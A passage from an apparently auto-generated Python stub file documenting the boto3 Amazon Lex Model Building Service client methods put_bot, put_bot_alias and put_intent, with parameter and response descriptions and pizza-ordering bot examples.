true if the bot is configured to send user utterances to Amazon Comprehend for sentiment analysis. If the detectSentiment field was not specified in the request, the detectSentiment field is false in the response.
tags (list) --
A list of tags associated with the bot.
(dict) --
A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --
The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --
The value associated with a key. The value may be an empty string but it can\'t be null.
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
Examples
This example shows how to create a bot for ordering pizzas.
response = client.put_bot(
name='DocOrderPizzaBot',
abortStatement={
'messages': [
{
'content': 'I don't understand. Can you try again?',
'contentType': 'PlainText',
},
{
'content': 'I'm sorry, I don't understand.',
'contentType': 'PlainText',
},
],
},
childDirected=True,
clarificationPrompt={
'maxAttempts': 1,
'messages': [
{
'content': 'I'm sorry, I didn't hear that. Can you repeate what you just said?',
'contentType': 'PlainText',
},
{
'content': 'Can you say that again?',
'contentType': 'PlainText',
},
],
},
description='Orders a pizza from a local pizzeria.',
idleSessionTTLInSeconds=300,
intents=[
{
'intentName': 'DocOrderPizza',
'intentVersion': '$LATEST',
},
],
locale='en-US',
processBehavior='SAVE',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizzaBot',
'abortStatement': {
'messages': [
{
'content': 'I don't understand. Can you try again?',
'contentType': 'PlainText',
},
{
'content': 'I'm sorry, I don't understand.',
'contentType': 'PlainText',
},
],
},
'checksum': '20172ee3-fa06-49b2-bbc5-667c090303e9',
'childDirected': True,
'clarificationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'I'm sorry, I didn't hear that. Can you repeate what you just said?',
'contentType': 'PlainText',
},
{
'content': 'Can you say that again?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494360160.133,
'description': 'Orders a pizza from a local pizzeria.',
'idleSessionTTLInSeconds': 300,
'intents': [
{
'intentName': 'DocOrderPizza',
'intentVersion': '$LATEST',
},
],
'lastUpdatedDate': 1494360160.133,
'locale': 'en-US',
'status': 'NOT_BUILT',
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'createVersion': True|False,
'detectSentiment': True|False,
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
"""
pass
def put_bot_alias(name=None, description=None, botVersion=None, botName=None, checksum=None, conversationLogs=None, tags=None):
"""
Creates an alias for the specified version of the bot or replaces an alias for the specified bot. To change the version of the bot that the alias points to, replace the alias. For more information about aliases, see versioning-aliases .
This operation requires permissions for the lex:PutBotAlias action.
See also: AWS API Documentation
Exceptions
:example: response = client.put_bot_alias(
name='string',
description='string',
botVersion='string',
botName='string',
checksum='string',
conversationLogs={
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string'
},
],
'iamRoleArn': 'string'
},
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
:type name: string
:param name: [REQUIRED]\nThe name of the alias. The name is not case sensitive.\n
:type description: string
:param description: A description of the alias.
:type botVersion: string
:param botVersion: [REQUIRED]\nThe version of the bot.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot.\n
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new bot alias, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update a bot alias, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type conversationLogs: dict
:param conversationLogs: Settings for conversation logs for the alias.\n\nlogSettings (list) -- [REQUIRED]The settings for your conversation logs. You can log the conversation text, conversation audio, or both.\n\n(dict) --Settings used to configure delivery mode and destination for conversation logs.\n\nlogType (string) -- [REQUIRED]The type of logging to enable. Text logs are delivered to a CloudWatch Logs log group. Audio logs are delivered to an S3 bucket.\n\ndestination (string) -- [REQUIRED]Where the logs will be delivered. Text logs are delivered to a CloudWatch Logs log group. Audio logs are delivered to an S3 bucket.\n\nkmsKeyArn (string) --The Amazon Resource Name (ARN) of the AWS KMS customer managed key for encrypting audio logs delivered to an S3 bucket. The key does not apply to CloudWatch Logs and is optional for S3 buckets.\n\nresourceArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs should be delivered.\n\n\n\n\n\niamRoleArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of an IAM role with permission to write to your CloudWatch Logs for text logs and your S3 bucket for audio logs. If audio encryption is enabled, this role also provides access permission for the AWS KMS key used for encrypting audio logs. For more information, see Creating an IAM Role and Policy for Conversation Logs .\n\n\n
:type tags: list
:param tags: A list of tags to add to the bot alias. You can only add tags when you create an alias, you can\'t use the PutBotAlias operation to update the tags on a bot alias. To update tags, use the TagResource operation.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
},
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
Response Structure
(dict) --
name (string) --
The name of the alias.
description (string) --
A description of the alias.
botVersion (string) --
The version of the bot that the alias points to.
botName (string) --
The name of the bot that the alias points to.
lastUpdatedDate (datetime) --
The date that the bot alias was updated. When you create a resource, the creation date and the last updated date are the same.
createdDate (datetime) --
The date that the bot alias was created.
checksum (string) --
The checksum for the current version of the alias.
conversationLogs (dict) --
The settings that determine how Amazon Lex uses conversation logs for the alias.
logSettings (list) --
The settings for your conversation logs. You can log text, audio, or both.
(dict) --
The settings for conversation logs.
logType (string) --
The type of logging that is enabled.
destination (string) --
The destination where logs are delivered.
kmsKeyArn (string) --
The Amazon Resource Name (ARN) of the key used to encrypt audio logs in an S3 bucket.
resourceArn (string) --
The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs are delivered.
resourcePrefix (string) --
The resource prefix is the first part of the S3 object key within the S3 bucket that you specified to contain audio logs. For CloudWatch Logs it is the prefix of the log stream name within the log group that you specified.
iamRoleArn (string) --
The Amazon Resource Name (ARN) of the IAM role used to write your logs to CloudWatch Logs or an S3 bucket.
tags (list) --
A list of tags associated with a bot.
(dict) --
A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --
The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --
The value associated with a key. The value may be an empty string but it can\'t be null.
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
},
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
"""
pass
def put_intent(name=None, description=None, slots=None, sampleUtterances=None, confirmationPrompt=None, rejectionStatement=None, followUpPrompt=None, conclusionStatement=None, dialogCodeHook=None, fulfillmentActivity=None, parentIntentSignature=None, checksum=None, createVersion=None):
"""
Creates an intent or replaces an existing intent.
To define the interaction between the user and your bot, you use one or more intents. For a pizza ordering bot, for example, you would create an OrderPizza intent.
To create an intent or replace an existing intent, you must provide the following:
You can specify other optional information in the request, such as:
If you specify an existing intent name to update the intent, Amazon Lex replaces the values in the $LATEST version of the intent with the values in the request. Amazon Lex removes fields that you don\'t provide in the request. If you don\'t specify the required fields, Amazon Lex throws an exception. When you update the $LATEST version of an intent, the status field of any bot that uses the $LATEST version of the intent is set to NOT_BUILT .
For more information, see how-it-works .
This operation requires permissions for the lex:PutIntent action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to create an intent for ordering pizzas.
Expected Output:
:example: response = client.put_intent(
name='string',
description='string',
slots=[
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
sampleUtterances=[
'string',
],
confirmationPrompt={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
rejectionStatement={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
followUpPrompt={
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
conclusionStatement={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
dialogCodeHook={
'uri': 'string',
'messageVersion': 'string'
},
fulfillmentActivity={
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
parentIntentSignature='string',
checksum='string',
createVersion=True|False
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent. The name is not case sensitive.\nThe name can\'t match a built-in intent name, or a built-in intent name with 'AMAZON.' removed. For example, because there is a built-in intent called AMAZON.HelpIntent , you can\'t create a custom intent called HelpIntent .\nFor a list of built-in intents, see Standard Built-in Intents in the Alexa Skills Kit .\n
:type description: string
:param description: A description of the intent.
:type slots: list
:param slots: An array of intent slots. At runtime, Amazon Lex elicits required slot values from the user using prompts defined in the slots. For more information, see how-it-works .\n\n(dict) --Identifies the version of a specific slot.\n\nname (string) -- [REQUIRED]The name of the slot.\n\ndescription (string) --A description of the slot.\n\nslotConstraint (string) -- [REQUIRED]Specifies whether the slot is required or optional.\n\nslotType (string) --The type of the slot, either a custom slot type that you defined or one of the built-in slot types.\n\nslotTypeVersion (string) --The version of the slot type.\n\nvalueElicitationPrompt (dict) --The prompt that Amazon Lex uses to elicit the slot value from the user.\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n\npriority (integer) --Directs Lex the order in which to elicit this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, AWS Lex first elicits a value for the slot with priority 1.\nIf multiple slots share the same priority, the order in which Lex elicits values is arbitrary.\n\nsampleUtterances (list) --If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.\n\n(string) --\n\n\nresponseCard (string) --A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.\n\nobfuscationSetting (string) --Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is 'full_name', obfuscated values are replaced with '{full_name}'. For more information, see Slot Obfuscation .\n\n\n\n\n
:type sampleUtterances: list
:param sampleUtterances: An array of utterances (strings) that a user might say to signal the intent. For example, 'I want {PizzaSize} pizza', 'Order {Quantity} {PizzaSize} pizzas'.\nIn each utterance, a slot name is enclosed in curly braces.\n\n(string) --\n\n
:type confirmationPrompt: dict
:param confirmationPrompt: Prompts the user to confirm the intent. This question should have a yes or no answer.\nAmazon Lex uses this prompt to ensure that the user acknowledges that the intent is ready for fulfillment. For example, with the OrderPizza intent, you might want to confirm that the order is correct before placing it. For other intents, such as intents that simply respond to user questions, you might not need to ask the user for confirmation before providing the information.\n\nNote\nYou you must provide both the rejectionStatement and the confirmationPrompt , or neither.\n\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n
:type rejectionStatement: dict
:param rejectionStatement: When the user answers 'no' to the question defined in confirmationPrompt , Amazon Lex responds with this statement to acknowledge that the intent was canceled.\n\nNote\nYou must provide both the rejectionStatement and the confirmationPrompt , or neither.\n\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n
:type followUpPrompt: dict
:param followUpPrompt: Amazon Lex uses this prompt to solicit additional activity after fulfilling an intent. For example, after the OrderPizza intent is fulfilled, you might prompt the user to order a drink.\nThe action that Amazon Lex takes depends on the user\'s response, as follows:\n\nIf the user says 'Yes' it responds with the clarification prompt that is configured for the bot.\nif the user says 'Yes' and continues with an utterance that triggers an intent it starts a conversation for the intent.\nIf the user says 'No' it responds with the rejection statement configured for the the follow-up prompt.\nIf it doesn\'t recognize the utterance it repeats the follow-up prompt again.\n\nThe followUpPrompt field and the conclusionStatement field are mutually exclusive. You can specify only one.\n\nprompt (dict) -- [REQUIRED]Prompts for information from the user.\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n\nrejectionStatement (dict) -- [REQUIRED]If the user answers 'no' to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n\n\n
:type conclusionStatement: dict
:param conclusionStatement: The statement that you want Amazon Lex to convey to the user after the intent is successfully fulfilled by the Lambda function.\nThis element is relevant only if you provide a Lambda function in the fulfillmentActivity . If you return the intent to the client application, you can\'t specify this element.\n\nNote\nThe followUpPrompt and conclusionStatement are mutually exclusive. You can specify only one.\n\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n
:type dialogCodeHook: dict
:param dialogCodeHook: Specifies a Lambda function to invoke for each user input. You can invoke this Lambda function to personalize user interaction.\nFor example, suppose your bot determines that the user is John. Your Lambda function might retrieve John\'s information from a backend database and prepopulate some of the values. For example, if you find that John is gluten intolerant, you might set the corresponding intent slot, GlutenIntolerant , to true. You might find John\'s phone number and set the corresponding session attribute.\n\nuri (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Lambda function.\n\nmessageVersion (string) -- [REQUIRED]The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .\n\n\n
:type fulfillmentActivity: dict
:param fulfillmentActivity: Required. Describes how the intent is fulfilled. For example, after a user provides all of the information for a pizza order, fulfillmentActivity defines how the bot places an order with a local pizza store.\nYou might configure Amazon Lex to return all of the intent information to the client application, or direct it to invoke a Lambda function that can process the intent (for example, place an order with a pizzeria).\n\ntype (string) -- [REQUIRED]How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.\n\ncodeHook (dict) --A description of the Lambda function that is run to fulfill the intent.\n\nuri (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Lambda function.\n\nmessageVersion (string) -- [REQUIRED]The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .\n\n\n\n\n
:type parentIntentSignature: string
:param parentIntentSignature: A unique identifier for the built-in intent to base this intent on. To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new intent, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update a intent, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type createVersion: boolean
:param createVersion: When set to true a new numbered version of the intent is created. This is the same as calling the CreateIntentVersion operation. If you do not specify createVersion , the default is false .
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'createVersion': True|False
}
Response Structure
(dict) --
name (string) --
The name of the intent.
description (string) --
A description of the intent.
slots (list) --
An array of intent slots that are configured for the intent.
(dict) --
Identifies the version of a specific slot.
name (string) --
The name of the slot.
description (string) --
A description of the slot.
slotConstraint (string) --
Specifies whether the slot is required or optional.
slotType (string) --
The type of the slot, either a custom slot type that you defined or one of the built-in slot types.
slotTypeVersion (string) --
The version of the slot type.
valueElicitationPrompt (dict) --
The prompt that Amazon Lex uses to elicit the slot value from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
priority (integer) --
Directs Lex the order in which to elicit this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, AWS Lex first elicits a value for the slot with priority 1.
If multiple slots share the same priority, the order in which Lex elicits values is arbitrary.
sampleUtterances (list) --
If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.
(string) --
responseCard (string) --
A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.
obfuscationSetting (string) --
Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is "full_name", obfuscated values are replaced with "{full_name}". For more information, see Slot Obfuscation .
sampleUtterances (list) --
An array of sample utterances that are configured for the intent.
(string) --
confirmationPrompt (dict) --
If defined in the intent, Amazon Lex prompts the user to confirm the intent before fulfilling it.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in confirmationPrompt Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
followUpPrompt (dict) --
If defined in the intent, Amazon Lex uses this prompt to solicit additional user activity after the intent is fulfilled.
prompt (dict) --
Prompts for information from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
conclusionStatement (dict) --
After the Lambda function specified in the``fulfillmentActivity`` intent fulfills the intent, Amazon Lex conveys this statement to the user.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
dialogCodeHook (dict) --
If defined in the intent, Amazon Lex invokes this Lambda function for each user input.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
fulfillmentActivity (dict) --
If defined in the intent, Amazon Lex invokes this Lambda function to fulfill the intent after the user provides all of the information required by the intent.
type (string) --
How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.
codeHook (dict) --
A description of the Lambda function that is run to fulfill the intent.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
parentIntentSignature (string) --
A unique identifier for the built-in intent that this intent is based on.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create a resource, the creation date and last update dates are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent. For a new intent, the version is always $LATEST .
checksum (string) --
Checksum of the $LATEST version of the intent created or updated.
createVersion (boolean) --
True if a new version of the intent was created. If the createVersion field was not specified in the request, the createVersion field is set to false in the response.
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
Examples
This example shows how to create an intent for ordering pizzas.
response = client.put_intent(
name='DocOrderPizza',
conclusionStatement={
'messages': [
{
'content': 'All right, I ordered you a {Crust} crust {Type} pizza with {Sauce} sauce.',
'contentType': 'PlainText',
},
{
'content': 'OK, your {Crust} crust {Type} pizza with {Sauce} sauce is on the way.',
'contentType': 'PlainText',
},
],
'responseCard': 'foo',
},
confirmationPrompt={
'maxAttempts': 1,
'messages': [
{
'content': 'Should I order your {Crust} crust {Type} pizza with {Sauce} sauce?',
'contentType': 'PlainText',
},
],
},
description='Order a pizza from a local pizzeria.',
fulfillmentActivity={
'type': 'ReturnIntent',
},
rejectionStatement={
'messages': [
{
'content': 'Ok, I'll cancel your order.',
